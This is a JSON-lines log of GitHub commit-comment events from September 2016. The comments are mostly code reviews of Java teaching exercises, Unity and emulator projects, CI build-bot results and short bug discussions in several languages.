{"id":"4627839219","type":"CommitCommentEvent","actor":{"login":"sypherce"},"repo":{"name":"sypherce/ds2key"},"payload":{"comment":{"id":19200386,"position":null,"line":null,"path":null,"commit_id":"7b48f08d68706115384aa5292e86836124fd9e5f","created_at":"2016-09-28T00:44:47Z","updated_at":"2016-09-28T00:44:47Z","body":"Involves issue #31"}},"created_at":"2016-09-28T00:44:47Z"}
{"id":"4627839474","type":"CommitCommentEvent","actor":{"login":"sypherce"},"repo":{"name":"sypherce/ds2key"},"payload":{"comment":{"id":19200387,"position":null,"line":null,"path":null,"commit_id":"d7f3b573fc889d193dbe25afeabea909637d18b7","created_at":"2016-09-28T00:44:53Z","updated_at":"2016-09-28T00:44:53Z","body":"Involves issue #31"}},"created_at":"2016-09-28T00:44:53Z"}
{"id":"4627839714","type":"CommitCommentEvent","actor":{"login":"jianbin-wei"},"repo":{"name":"Parsely/pykafka"},"payload":{"comment":{"id":19200388,"position":null,"line":null,"path":null,"commit_id":"9f9e07df99ae05383724820cccb126a3e33ef2a4","created_at":"2016-09-28T00:44:59Z","updated_at":"2016-09-28T00:44:59Z","body":"@emmett9001 , one question with the use of \"while not success\".  If success is False, in case of greenlet, this would prevent another greenlet to update self._topic and self._owned_brokers, right?  Also if there is no another greenlet to update them, it would stuck too?\r\n\r\nWe have an issue that the producer stuck in this \"while\" loop."}},"created_at":"2016-09-28T00:44:59Z"}
{"id":"4627840670","type":"CommitCommentEvent","actor":{"login":"claudioandre"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19200393,"position":null,"line":null,"path":null,"commit_id":"7b47e453b4207fd758a2e2d2f5c642c15a8f32a6","created_at":"2016-09-28T00:45:17Z","updated_at":"2016-09-28T00:45:17Z","body":"> Could you look at what would be needed in our .travis.yml file to get things working\r\n\r\nUsing my fork repo, I will revert (and commit) any asan fix. Then I will take a closer took at how \"to do\" and test it. "}},"created_at":"2016-09-28T00:45:17Z"}
{"id":"4627848877","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19200413,"position":null,"line":null,"path":null,"commit_id":"aba6eba0d2ea2215a7c83ff471a14b1f7c32bf5b","created_at":"2016-09-28T00:48:07Z","updated_at":"2016-09-28T00:48:07Z","body":"好 那我改成Tab"}},"created_at":"2016-09-28T00:48:07Z"}
{"id":"4627849395","type":"CommitCommentEvent","actor":{"login":"frmdstryr"},"repo":{"name":"frmdstryr/garden.mapview"},"payload":{"comment":{"id":19200416,"position":null,"line":null,"path":null,"commit_id":"8e101d5cf21206b2e192beab5a382f7615ca42ad","created_at":"2016-09-28T00:48:18Z","updated_at":"2016-09-28T00:48:18Z","body":"Yes but it only gives a slight performance improvement."}},"created_at":"2016-09-28T00:48:18Z"}
{"id":"4627854635","type":"CommitCommentEvent","actor":{"login":"filran"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19200432,"position":12,"line":21,"path":"Assets/Scripts/View/Visar3DDynamic.cs","commit_id":"312c8f38ca9be7a5d4428f458efd574553780706","created_at":"2016-09-28T00:50:05Z","updated_at":"2016-09-28T00:50:05Z","body":"Vamos tentar agrupar pelos tipos de variáveis, e.g, subir esta linha."}},"created_at":"2016-09-28T00:50:05Z"}
{"id":"4627854772","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"RodrigoScheuer/crescer-2016-2"},"payload":{"comment":{"id":19200433,"position":27,"line":27,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"65cb6a73080ceec508c4876554408d5063400b5e","created_at":"2016-09-28T00:50:08Z","updated_at":"2016-09-28T00:50:08Z","body":"Cuidar a indentação do código para que fique sempre padronizada e facilite a leitura."}},"created_at":"2016-09-28T00:50:08Z"}
{"id":"4627855307","type":"CommitCommentEvent","actor":{"login":"wangxiaoerzuishuai"},"repo":{"name":"wangxiaoerzuishuai/wangxiaoerzuishuai.github.io"},"payload":{"comment":{"id":19200438,"position":null,"line":null,"path":null,"commit_id":"ef126cf1610564ac0da574d7f0d4f8536dd7df3f","created_at":"2016-09-28T00:50:18Z","updated_at":"2016-09-28T00:50:18Z","body":"finish"}},"created_at":"2016-09-28T00:50:18Z"}
{"id":"4627858107","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"OtavioBubans/crescer-2016-2"},"payload":{"comment":{"id":19200447,"position":11,"line":11,"path":"src/modulo-01-java-OO/modulo-01/Elfo.java","commit_id":"f8cac27a3ae867b0e5392ecc30bd91f977739f06","created_at":"2016-09-28T00:51:11Z","updated_at":"2016-09-28T00:51:11Z","body":"Este código é desnecessário, pois o Java já entende que 0 é o valor inicial para `int`"}},"created_at":"2016-09-28T00:51:11Z"}
{"id":"4627859690","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"OtavioBubans/crescer-2016-2"},"payload":{"comment":{"id":19200452,"position":22,"line":27,"path":"src/modulo-01-java-OO/modulo-01/Elfo.java","commit_id":"f8cac27a3ae867b0e5392ecc30bd91f977739f06","created_at":"2016-09-28T00:51:43Z","updated_at":"2016-09-28T00:51:43Z","body":"Pode deixar comentado este método. Ele serviu apenas para fazermos o exercício de refatoração. Não faz sentido que ele exista."}},"created_at":"2016-09-28T00:51:43Z"}
{"id":"4627860420","type":"CommitCommentEvent","actor":{"login":"filran"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19200457,"position":20,"line":27,"path":"Assets/Scripts/View/Visar3DDynamic.cs","commit_id":"312c8f38ca9be7a5d4428f458efd574553780706","created_at":"2016-09-28T00:51:58Z","updated_at":"2016-09-28T00:51:58Z","body":"@jfportalb não entendi por que tirou a declaração do tipo antes de XMI"}},"created_at":"2016-09-28T00:51:58Z"}
{"id":"4627862738","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19200464,"position":10,"line":32,"path":"main.js","commit_id":"64b58e28ffd459ffb19e099d260abe1f4f4a79a8","created_at":"2016-09-28T00:52:47Z","updated_at":"2016-09-28T00:52:47Z","body":"If there are no construction sites, `creep.room.find(FIND_CONSTRUCTION_SITES)` will return an empty array. In Javascript `[]` is considered truthy."}},"created_at":"2016-09-28T00:52:47Z"}
{"id":"4627865253","type":"CommitCommentEvent","actor":{"login":"filran"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19200477,"position":10,"line":22,"path":"Assets/Scripts/ParserXMI/XMI.cs","commit_id":"312c8f38ca9be7a5d4428f458efd574553780706","created_at":"2016-09-28T00:53:38Z","updated_at":"2016-09-28T00:53:38Z","body":"@jfportalb o string seria o xmi:id?"}},"created_at":"2016-09-28T00:53:38Z"}
{"id":"4627866725","type":"CommitCommentEvent","actor":{"login":"malcrom"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19200481,"position":null,"line":null,"path":null,"commit_id":"b153d783b9532c9a8c48312410f62df5ddd9f583","created_at":"2016-09-28T00:54:09Z","updated_at":"2016-09-28T00:54:09Z","body":"looks like good work."}},"created_at":"2016-09-28T00:54:09Z"}
{"id":"4627868984","type":"CommitCommentEvent","actor":{"login":"afausti"},"repo":{"name":"lsst-sqre/qa-dashboard"},"payload":{"comment":{"id":19200487,"position":null,"line":null,"path":null,"commit_id":"2cd8ca8af0403e4633783c8a65b6b7ac7e4b1f03","created_at":"2016-09-28T00:54:58Z","updated_at":"2016-09-28T00:54:58Z","body":"There is an explanation for the minimum size required for the test data set on the ticket https://jira.lsstcorp.org/browse/DM-7749"}},"created_at":"2016-09-28T00:54:58Z"}
{"id":"4627869412","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19200489,"position":null,"line":null,"path":null,"commit_id":"4c61deb596cc30285c9a719d2381d5eafecbfda2","created_at":"2016-09-28T00:55:07Z","updated_at":"2016-09-28T00:55:07Z","body":"⚠️ ⚠️ ⚠️ \r\n\r\nCuidado com o português na mensagem de commit, ok? O correto seria \"gerar novos testes\", visto que a convenção de commits diz para usar o verbo no infinitivo."}},"created_at":"2016-09-28T00:55:07Z"}
{"id":"4627870651","type":"CommitCommentEvent","actor":{"login":"Monroe88"},"repo":{"name":"ekeeke/Genesis-Plus-GX"},"payload":{"comment":{"id":19200493,"position":null,"line":null,"path":null,"commit_id":"8b909e40350ffe7a85176912c60f869221f57510","created_at":"2016-09-28T00:55:32Z","updated_at":"2016-09-28T00:55:32Z","body":"No, just using a standard XInput controller (Logitech F310). It shouldn't matter what physical controller you use since the device type option affects the core's emulated device only."}},"created_at":"2016-09-28T00:55:32Z"}
{"id":"4627876096","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19200502,"position":4,"line":21,"path":"src/modulo-01-java-OO/modulo-01/Elfo.java","commit_id":"4c61deb596cc30285c9a719d2381d5eafecbfda2","created_at":"2016-09-28T00:57:19Z","updated_at":"2016-09-28T00:57:19Z","body":"Opa, não precisa disto.\r\n\r\nO correto seria criar um `getFlecha`, que retorna o objeto do tipo `Item` e aí sim pega `getQuantidade()`, ok?"}},"created_at":"2016-09-28T00:57:19Z"}
{"id":"4627880211","type":"CommitCommentEvent","actor":{"login":"matheusaugsschmitz"},"repo":{"name":"matheusaugsschmitz/crescer-2016-2"},"payload":{"comment":{"id":19200518,"position":11,"line":11,"path":"modulo-01/Elfo.java","commit_id":"11648358cd33d30960c786320066854f72365b5d","created_at":"2016-09-28T00:58:43Z","updated_at":"2016-09-28T00:58:43Z","body":"Faz sentido, removi ela\r\n"}},"created_at":"2016-09-28T00:58:43Z"}
{"id":"4627880921","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19200519,"position":7,"line":7,"path":"src/modulo-01-java-OO/modulo-01/DwarvesTest.java","commit_id":"4c61deb596cc30285c9a719d2381d5eafecbfda2","created_at":"2016-09-28T00:58:58Z","updated_at":"2016-09-28T00:58:58Z","body":"Cliente não pediu para que Dwarves nascessem com nome. Faça apenas o necessário!"}},"created_at":"2016-09-28T00:58:58Z"}
{"id":"4627885180","type":"CommitCommentEvent","actor":{"login":"matheusaugsschmitz"},"repo":{"name":"matheusaugsschmitz/crescer-2016-2"},"payload":{"comment":{"id":19200528,"position":16,"line":16,"path":"modulo-01/Elfo.java","commit_id":"11648358cd33d30960c786320066854f72365b5d","created_at":"2016-09-28T01:00:21Z","updated_at":"2016-09-28T01:00:21Z","body":"Ok, eu pensava que ele criava algo com valor equivalente a null, mas esqueci que com variáveis numéricas é diferente."}},"created_at":"2016-09-28T01:00:21Z"}
{"id":"4627886015","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19200534,"position":36,"line":29,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"4c61deb596cc30285c9a719d2381d5eafecbfda2","created_at":"2016-09-28T01:00:36Z","updated_at":"2016-09-28T01:00:36Z","body":"O teste fica mais legível se você utilizar direto os valores que espera:\r\n\r\n```Java\r\nassertEquals(100, dwarve1.getVida());\r\nassertEquals(41, elfo1.numeroFlechas()); \r\n```"}},"created_at":"2016-09-28T01:00:36Z"}
{"id":"4627892305","type":"CommitCommentEvent","actor":{"login":"matheusaugsschmitz"},"repo":{"name":"matheusaugsschmitz/crescer-2016-2"},"payload":{"comment":{"id":19200556,"position":19,"line":19,"path":"modulo-01/Elfo.java","commit_id":"11648358cd33d30960c786320066854f72365b5d","created_at":"2016-09-28T01:02:41Z","updated_at":"2016-09-28T01:02:41Z","body":"Isso eu alterei hoje mesmo na aula, provavelmente por causa da internet deve ter dado ruim na hora de dar o push no GitKraken, mas já alterei isso de novo também."}},"created_at":"2016-09-28T01:02:41Z"}
{"id":"4627894241","type":"CommitCommentEvent","actor":{"login":"filran"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19200564,"position":22,"line":29,"path":"Assets/Scripts/View/Visar3DDynamic.cs","commit_id":"312c8f38ca9be7a5d4428f458efd574553780706","created_at":"2016-09-28T01:03:21Z","updated_at":"2016-09-28T01:03:21Z","body":"@jfportalb algo está errado. Testei com os dois prefabs que vc criou e mesmo assim acusa:\r\n`NullReferenceException: Object reference not set to an instance of an object\r\nView.Visar3DDynamic.addPackageDiagram (Vector3 position) (at Assets/Scripts/View/Visar3DDynamic.cs:64)\r\nView.Visar3DDynamic.Start () (at Assets/Scripts/View/Visar3DDynamic.cs:29)`"}},"created_at":"2016-09-28T01:03:21Z"}
{"id":"4627896643","type":"CommitCommentEvent","actor":{"login":"rakeshreddyvanga"},"repo":{"name":"shruthivinjamuri/CS999Independent_Study"},"payload":{"comment":{"id":19200573,"position":27,"line":27,"path":"src/Implementations/Graph.java","commit_id":"3b31cba4805264f4f96c44a3d04ba7a849204261","created_at":"2016-09-28T01:04:09Z","updated_at":"2016-09-28T01:04:09Z","body":"You are always creating new node here. What if 'from' and \"to\" are already in the Graph?"}},"created_at":"2016-09-28T01:04:09Z"}
{"id":"4627897498","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19200576,"position":13,"line":13,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"1c12038aeab0f0813b5ec715216c8d5312176f6d","created_at":"2016-09-28T01:04:27Z","updated_at":"2016-09-28T01:04:27Z","body":"Cuidar a indentação do código para que fique mais fácil de ler e entender."}},"created_at":"2016-09-28T01:04:27Z"}
{"id":"4627898488","type":"CommitCommentEvent","actor":{"login":"matheusaugsschmitz"},"repo":{"name":"matheusaugsschmitz/crescer-2016-2"},"payload":{"comment":{"id":19200579,"position":26,"line":26,"path":"modulo-01/Elfo.java","commit_id":"11648358cd33d30960c786320066854f72365b5d","created_at":"2016-09-28T01:04:48Z","updated_at":"2016-09-28T01:04:48Z","body":"Isso é outra coisa que eu removi em aula. Ontem quando estava fazendo comecei a fazer isso mas lembrei do que tu disse sobre ser o mais básico possível e mudei a lógica para algo mais simples, mas acabei não apagando esse método ontem. Também já foi removido."}},"created_at":"2016-09-28T01:04:48Z"}
{"id":"4627899883","type":"CommitCommentEvent","actor":{"login":"jehymes"},"repo":{"name":"tjbigodon/SisCoor-Horario-de-Aula"},"payload":{"comment":{"id":19200583,"position":null,"line":null,"path":null,"commit_id":"e1800807753d1a0673f024afc698dbe77d6be4ee","created_at":"2016-09-28T01:05:16Z","updated_at":"2016-09-28T01:05:16Z","body":"Fera em bigodin.... falta só mandar o código para eu colar um pouco... huahuahuahuahuahuahua"}},"created_at":"2016-09-28T01:05:16Z"}
{"id":"4627901745","type":"CommitCommentEvent","actor":{"login":"pbiggar"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":19200589,"position":13,"line":82,"path":"layers/+window-management/spacemacs-layouts/packages.el","commit_id":"f14ebb229714fb6e47f0c5267e6ee2156968ca70","created_at":"2016-09-28T01:05:52Z","updated_at":"2016-09-28T01:05:52Z","body":"I don't think this doc is accurate: [a] calls persp-add-buffer."}},"created_at":"2016-09-28T01:05:52Z"}
{"id":"4627902290","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19200593,"position":null,"line":null,"path":null,"commit_id":"198c6a3cffe4df717545e75a97f01510aa6a1875","created_at":"2016-09-28T01:06:03Z","updated_at":"2016-09-28T01:06:03Z","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-12: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-198c6a3cffe4df717545e75a97f01510aa6a1875-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-198c6a3cffe4df717545e75a97f01510aa6a1875-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-28T01:06:03Z"}
{"id":"4627904082","type":"CommitCommentEvent","actor":{"login":"NaianeMaria"},"repo":{"name":"tjbigodon/SisCoor-Horario-de-Aula"},"payload":{"comment":{"id":19200599,"position":null,"line":null,"path":null,"commit_id":"e1800807753d1a0673f024afc698dbe77d6be4ee","created_at":"2016-09-28T01:06:39Z","updated_at":"2016-09-28T01:06:39Z","body":"Isso ae feras do baile.... "}},"created_at":"2016-09-28T01:06:39Z"}
{"id":"4627905135","type":"CommitCommentEvent","actor":{"login":"pbarbosaprograma"},"repo":{"name":"pbarbosaprograma/MiRepo"},"payload":{"comment":{"id":19200604,"position":5,"line":5,"path":"main.c","commit_id":"ea87b5ee9dc4eef1ab5cf8509b0a1a950d3ca061","created_at":"2016-09-28T01:07:01Z","updated_at":"2016-09-28T01:07:01Z","body":"printf(\"chau\");\r\n"}},"created_at":"2016-09-28T01:07:01Z"}
{"id":"4627906237","type":"CommitCommentEvent","actor":{"login":"filran"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19200609,"position":55,"line":56,"path":"Assets/Scripts/View/Visar3DDynamic.cs","commit_id":"312c8f38ca9be7a5d4428f458efd574553780706","created_at":"2016-09-28T01:07:25Z","updated_at":"2016-09-28T01:07:25Z","body":"@jfportalb porque os dois métodos com assinaturas diferentes?"}},"created_at":"2016-09-28T01:07:25Z"}
{"id":"4627906366","type":"CommitCommentEvent","actor":{"login":"zhaobinhong001"},"repo":{"name":"zhaobinhong001/cnpc"},"payload":{"comment":{"id":19200610,"position":null,"line":null,"path":null,"commit_id":"da2817f46370a88e04d70d8e7fe15d463520036e","created_at":"2016-09-28T01:07:28Z","updated_at":"2016-09-28T01:07:28Z","body":"11"}},"created_at":"2016-09-28T01:07:28Z"}
{"id":"4627909188","type":"CommitCommentEvent","actor":{"login":"rakeshreddyvanga"},"repo":{"name":"shruthivinjamuri/CS999Independent_Study"},"payload":{"comment":{"id":19200619,"position":30,"line":30,"path":"src/Implementations/Graph.java","commit_id":"3b31cba4805264f4f96c44a3d04ba7a849204261","created_at":"2016-09-28T01:08:28Z","updated_at":"2016-09-28T01:08:28Z","body":"I guess you need to update the \"from\" node's out edges here?"}},"created_at":"2016-09-28T01:08:28Z"}
{"id":"4627912622","type":"CommitCommentEvent","actor":{"login":"rakeshreddyvanga"},"repo":{"name":"shruthivinjamuri/CS999Independent_Study"},"payload":{"comment":{"id":19200637,"position":29,"line":29,"path":"src/Implementations/Graph.java","commit_id":"3b31cba4805264f4f96c44a3d04ba7a849204261","created_at":"2016-09-28T01:09:40Z","updated_at":"2016-09-28T01:09:40Z","body":"Need to check that cost is less than the costInterval for the graph."}},"created_at":"2016-09-28T01:09:40Z"}
{"id":"4627915386","type":"CommitCommentEvent","actor":{"login":"micrictor"},"repo":{"name":"micrictor/stuxnet"},"payload":{"comment":{"id":19200642,"position":4,"line":73,"path":"Dropper/CodeBlock.c","commit_id":"e6fa6e31f25aa2dbee744aa64c7d432a73c3fb47","created_at":"2016-09-28T01:10:35Z","updated_at":"2016-09-28T01:10:35Z","body":"In fact, almost every function gets called on virus startup, in some way or another, so that's kind of a redundant comment\r\n"}},"created_at":"2016-09-28T01:10:35Z"}
{"id":"4627917993","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":19200648,"position":10,"line":6,"path":"pkgbuild-introspection-git/PKGBUILD","commit_id":"023066b0a28a28419b869bc18d29b607c6a6bc31","created_at":"2016-09-28T01:11:29Z","updated_at":"2016-09-28T01:11:29Z","body":"不奇怪啊。"}},"created_at":"2016-09-28T01:11:29Z"}
{"id":"4627921528","type":"CommitCommentEvent","actor":{"login":"TeamSpen210"},"repo":{"name":"TeamSpen210/BEE2-items"},"payload":{"comment":{"id":19200660,"position":null,"line":null,"path":null,"commit_id":"9065031355ff0f970795c7f4ee5ac223bfaefb37","created_at":"2016-09-28T01:12:45Z","updated_at":"2016-09-28T01:12:45Z","body":"This fixes #287."}},"created_at":"2016-09-28T01:12:45Z"}
{"id":"4627921894","type":"CommitCommentEvent","actor":{"login":"coorg"},"repo":{"name":"ekeeke/Genesis-Plus-GX"},"payload":{"comment":{"id":19200661,"position":null,"line":null,"path":null,"commit_id":"8b909e40350ffe7a85176912c60f869221f57510","created_at":"2016-09-28T01:12:52Z","updated_at":"2016-09-28T01:12:52Z","body":"hmmm I can't get the md 3 button option to come up on a fresh build.  Retropad> Unknown> none are the only options in the quick menu.  Also when scrolling through the options it crashes retroarch. \r\n\r\nI'm going to grab my f310's and give it a try."}},"created_at":"2016-09-28T01:12:52Z"}
{"id":"4627922821","type":"CommitCommentEvent","actor":{"login":"jadonk"},"repo":{"name":"RobertCNelson/dtb-rebuilder"},"payload":{"comment":{"id":19200666,"position":12,"line":13,"path":"src/arm/am335x-boneblue-wl1835.dtsi","commit_id":"48a1dbc0df3dd9863504dc71b79e995cdaa5d5a5","created_at":"2016-09-28T01:13:12Z","updated_at":"2016-09-28T01:13:12Z","body":"Why is the default-state \"off\"?"}},"created_at":"2016-09-28T01:13:12Z"}
{"id":"4627926058","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19200672,"position":1,"line":1,"path":"src/modulo-01-java-OO/modulo-01/Dwarves.java","commit_id":"8916711fc8c6c471f46438b825a6aabd1bd75290","created_at":"2016-09-28T01:14:24Z","updated_at":"2016-09-28T01:14:24Z","body":"Cuidado. `Dwarves` é no plural. Se cada objeto desta classe representasse um grupo de Dwarf, aí sim `Dwarves` estaria correto, concorda?"}},"created_at":"2016-09-28T01:14:24Z"}
{"id":"4627926662","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19200675,"position":9,"line":9,"path":"src/modulo-01-java-OO/modulo-01/Dwarves.java","commit_id":"8916711fc8c6c471f46438b825a6aabd1bd75290","created_at":"2016-09-28T01:14:37Z","updated_at":"2016-09-28T01:14:37Z","body":"Cliente não pediu isto."}},"created_at":"2016-09-28T01:14:37Z"}
{"id":"4627926975","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19200677,"position":null,"line":null,"path":null,"commit_id":"198c6a3cffe4df717545e75a97f01510aa6a1875","created_at":"2016-09-28T01:14:43Z","updated_at":"2016-09-28T01:14:43Z","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-12: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-198c6a3cffe4df717545e75a97f01510aa6a1875-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-198c6a3cffe4df717545e75a97f01510aa6a1875-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-28T01:14:43Z"}
{"id":"4627928687","type":"CommitCommentEvent","actor":{"login":"othiym23"},"repo":{"name":"isaacs/node-graceful-fs"},"payload":{"comment":{"id":19200681,"position":12,"line":39,"path":"test/stats-uid-gid.js","commit_id":"7311ee26993a32186100c205b8802f0cc8e54420","created_at":"2016-09-28T01:15:20Z","updated_at":"2016-09-28T01:15:20Z","body":"s/async/sync/?"}},"created_at":"2016-09-28T01:15:20Z"}
{"id":"4627929324","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19200685,"position":7,"line":21,"path":"src/modulo-01-java-OO/modulo-01/Elfo.java","commit_id":"8916711fc8c6c471f46438b825a6aabd1bd75290","created_at":"2016-09-28T01:15:32Z","updated_at":"2016-09-28T01:15:32Z","body":"Cliente não pediu para retornar true ou false neste método. Não é necessário. Fazer apenas o básico."}},"created_at":"2016-09-28T01:15:32Z"}
{"id":"4627931132","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19200692,"position":16,"line":30,"path":"src/modulo-01-java-OO/modulo-01/Elfo.java","commit_id":"8916711fc8c6c471f46438b825a6aabd1bd75290","created_at":"2016-09-28T01:16:10Z","updated_at":"2016-09-28T01:16:10Z","body":"Cliente não pediu isto. Sugiro que pense mais simples, como um elfo faz para caçar um dwarf?"}},"created_at":"2016-09-28T01:16:10Z"}
{"id":"4627934249","type":"CommitCommentEvent","actor":{"login":"LipiLee"},"repo":{"name":"kosslab-kr/toybox"},"payload":{"comment":{"id":19200701,"position":null,"line":null,"path":null,"commit_id":"139d422817cc5194b6cadc20ec5b06bac02e3e9f","created_at":"2016-09-28T01:17:15Z","updated_at":"2016-09-28T01:17:15Z","body":"Toybox 공식 저장소에 패치 전달했더니 롭이 넣어줬습니다.\r\n\r\n참고: https://github.com/landley/toybox/commit/af4be15b84ed8cf80d169d02949bdf3b2ea63cd5\r\n"}},"created_at":"2016-09-28T01:17:15Z"}
{"id":"4627937530","type":"CommitCommentEvent","actor":{"login":"wevertonsreis"},"repo":{"name":"wevertonsreis/Java-SE-7-Programmer-II"},"payload":{"comment":{"id":19200711,"position":54,"line":54,"path":"src/br/com/ocpjp7/capitulo4/teste1/Teste1.java","commit_id":"d76dd3e40063ed924e7f6ebbb5dd47ddcde69757","created_at":"2016-09-28T01:18:25Z","updated_at":"2016-09-28T01:18:25Z","body":"teste"}},"created_at":"2016-09-28T01:18:25Z"}
{"id":"4627941031","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19200720,"position":7,"line":7,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembasTest.java","commit_id":"4c61deb596cc30285c9a719d2381d5eafecbfda2","created_at":"2016-09-28T01:19:39Z","updated_at":"2016-09-28T01:19:39Z","body":"Este nome para o método não é bom. Não dá pra entender o que o cenário testa. Escolhe um melhor!"}},"created_at":"2016-09-28T01:19:39Z"}
{"id":"4627942040","type":"CommitCommentEvent","actor":{"login":"noghiri"},"repo":{"name":"addictgamer/Terrastation-13"},"payload":{"comment":{"id":19200725,"position":null,"line":null,"path":null,"commit_id":"c16b2d788aa8a34eae2bb36bf4705ca37fb81135","created_at":"2016-09-28T01:20:00Z","updated_at":"2016-09-28T01:20:00Z","body":"As a side note, both 1911s and their associated magazines are common class-gear for detective in paradise branch, so that bit should(hopefully) not break."}},"created_at":"2016-09-28T01:20:00Z"}
{"id":"4627942134","type":"CommitCommentEvent","actor":{"login":"rjoncontract"},"repo":{"name":"ragunathjawahar/kaffeine"},"payload":{"comment":{"id":19200727,"position":54,"line":72,"path":"README.md","commit_id":"52a29f008922620f35adc6bc678b53339a756522","created_at":"2016-09-28T01:20:02Z","updated_at":"2016-09-28T01:20:02Z","body":"No, it isn't. It should have been `showLongToast`"}},"created_at":"2016-09-28T01:20:02Z"}
{"id":"4627943641","type":"CommitCommentEvent","actor":{"login":"Cxrbrnrd"},"repo":{"name":"IconosInstituto/contaminacion"},"payload":{"comment":{"id":19200729,"position":null,"line":null,"path":null,"commit_id":"ed99c057225ddca880711e76cb4fa6b9f14c0bf8","created_at":"2016-09-28T01:20:33Z","updated_at":"2016-09-28T01:20:33Z","body":"images"}},"created_at":"2016-09-28T01:20:33Z"}
{"id":"4627944048","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19200730,"position":null,"line":null,"path":null,"commit_id":"8a6c19b968c4e61b4b79e59bdb4f8c5745502c1a","created_at":"2016-09-28T01:20:41Z","updated_at":"2016-09-28T01:20:41Z","body":"ENERGYPLUS_EXPECTED_HASH (evanweaver) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2362 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8a6c19b968c4e61b4b79e59bdb4f8c5745502c1a-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8a6c19b968c4e61b4b79e59bdb4f8c5745502c1a-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.49%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T01:20:41Z"}
{"id":"4627948179","type":"CommitCommentEvent","actor":{"login":"eddieridwan"},"repo":{"name":"eddieridwan/OpenSID"},"payload":{"comment":{"id":19200736,"position":null,"line":null,"path":null,"commit_id":"a2149c920690d8ed1df18db75115ef2d53787884","created_at":"2016-09-28T01:22:08Z","updated_at":"2016-09-28T01:22:08Z","body":"Ya, masih bisa seperti itu. Tetapi untuk satu program bantuan, misalnya Bedah Rumah, kalau keluarga itu sudah jadi peserta tidak akan tampil lagi di daftar pilihan untuk program itu. Ini sama halnya juga untuk program dgn sasaran penduduk. Sebenarnya penyaringan ini sdh diterapkan di SID CRI asli, tapi mereka terapkannya salah."}},"created_at":"2016-09-28T01:22:08Z"}
